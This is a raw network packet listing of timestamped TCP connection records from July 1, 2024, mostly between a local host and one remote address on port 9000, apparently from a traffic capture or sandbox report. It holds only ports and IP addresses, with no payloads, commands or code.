Jul 1, 2024 09:16:32.019550085 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.019563913 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019576073 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019578934 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.019599915 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.019599915 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019614935 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.019629955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019643068 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019644976 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.019655943 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019669056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019678116 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.019701958 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.019759893 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019773006 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019812107 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.022416115 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.022428036 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.023416996 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.023456097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.023468018 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.023503065 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.023509979 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.023535013 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.023535967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.023561954 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.023593903 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.023602009 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.023607016 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.023617983 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.023628950 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.023643017 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.023662090 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.024097919 CEST	49789	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.024128914 CEST	443	49789	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.024274111 CEST	49789	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.024962902 CEST	49789	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.024977922 CEST	443	49789	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.036226988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.036238909 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.036252975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.036274910 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.036309004 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.036336899 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.036350012 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.036361933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.036372900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.036375046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.036400080 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.036426067 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.065869093 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.065881014 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.065892935 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.065927982 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.065960884 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.065977097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.065989017 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.066000938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.066013098 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.066021919 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.066051006 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.076819897 CEST	50500	49786	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:32.091620922 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.091635942 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.091648102 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.091717958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.091718912 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.091730118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.091742992 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.091768980 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.091789007 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.092161894 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.092204094 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.093765974 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.093799114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.093810081 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.093827009 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.093858957 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.093861103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.093874931 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.093887091 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.093915939 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.093935966 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.094003916 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.094048023 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.094149113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.094160080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.094197035 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.097444057 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.097456932 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.097470045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.097481966 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.097496033 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.097506046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.097542048 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.097592115 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.097603083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.097615004 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.097635031 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.097656965 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.098716021 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.098753929 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.098764896 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.098784924 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.098798990 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.098814011 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.098828077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.098839998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.098850965 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.098865032 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.098889112 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.098906994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.098942041 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.099071026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.099117041 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.099117041 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.099131107 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.099169970 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.099957943 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.100002050 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.100166082 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.100178957 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.100214958 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.100228071 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.100791931 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.100805998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.100845098 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.100857019 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.101908922 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.101921082 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.101972103 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.102030039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102046967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102058887 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102071047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102082014 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102089882 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.102093935 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102106094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102111101 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.102116108 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102127075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102133036 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.102140903 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102150917 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.102152109 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102164030 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102169037 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.102174997 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.102195024 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.102221012 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.105652094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.105664968 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.105675936 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.105688095 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.105700016 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.105709076 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.105711937 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.105725050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.105746984 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.105777025 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.108052015 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.108063936 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.108077049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.108100891 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.108140945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.108185053 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.108196974 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.108210087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.108230114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.108247995 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.108388901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.108473063 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109302044 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109313965 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109324932 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109337091 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109353065 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109371901 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109400034 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109622955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109636068 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109647989 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109658957 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109668970 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109688044 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109700918 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109780073 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109817028 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109920025 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109932899 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109944105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109956026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109961033 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109966993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.109978914 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.109983921 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110007048 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.110021114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.110512018 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110531092 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110542059 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110558033 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110569954 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110569954 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.110583067 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110589027 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.110596895 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110609055 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.110621929 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.110639095 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.110662937 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.111346960 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.111367941 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.111378908 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.111397982 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.111408949 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.111432076 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.111527920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.111540079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.111557961 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.111566067 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.111571074 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.111588001 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.111601114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.111610889 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.114274979 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.114285946 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.114299059 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.114311934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.114322901 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.114341021 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.114378929 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.114417076 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.114429951 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.114442110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.114460945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.114484072 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.114593983 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.114636898 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.127098083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.127119064 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.127130032 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.127141953 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.127157927 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.127259970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.127273083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.127284050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.127296925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.127309084 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.127314091 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.127329111 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.127350092 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.158020020 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.158032894 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.158091068 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.158193111 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.158205032 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.158217907 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.158230066 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.158231020 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.158250093 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.158263922 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.158354044 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.158386946 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.178451061 CEST	50500	49787	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:32.182627916 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.182643890 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.182691097 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.182773113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.182785988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.182796955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.182807922 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.182820082 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.182821989 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.182840109 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.182862043 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.185328007 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.185340881 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.185352087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.185364008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.185375929 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.185379982 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.185419083 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.185419083 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.185514927 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.185525894 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.185538054 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.185545921 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.185559034 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.185576916 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.188414097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.188466072 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.188548088 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.188585997 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197067022 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197079897 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197091103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197129965 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197160006 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197232008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197244883 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197277069 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197369099 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197388887 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197401047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197410107 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197412968 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197423935 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197424889 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197459936 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197552919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197565079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197571039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197577953 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197588921 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197588921 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197602034 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.197618008 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.197644949 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.199625015 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199637890 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199650049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199661970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.199672937 CEST	9000	49782	195.201.251.214	192.168.2.4
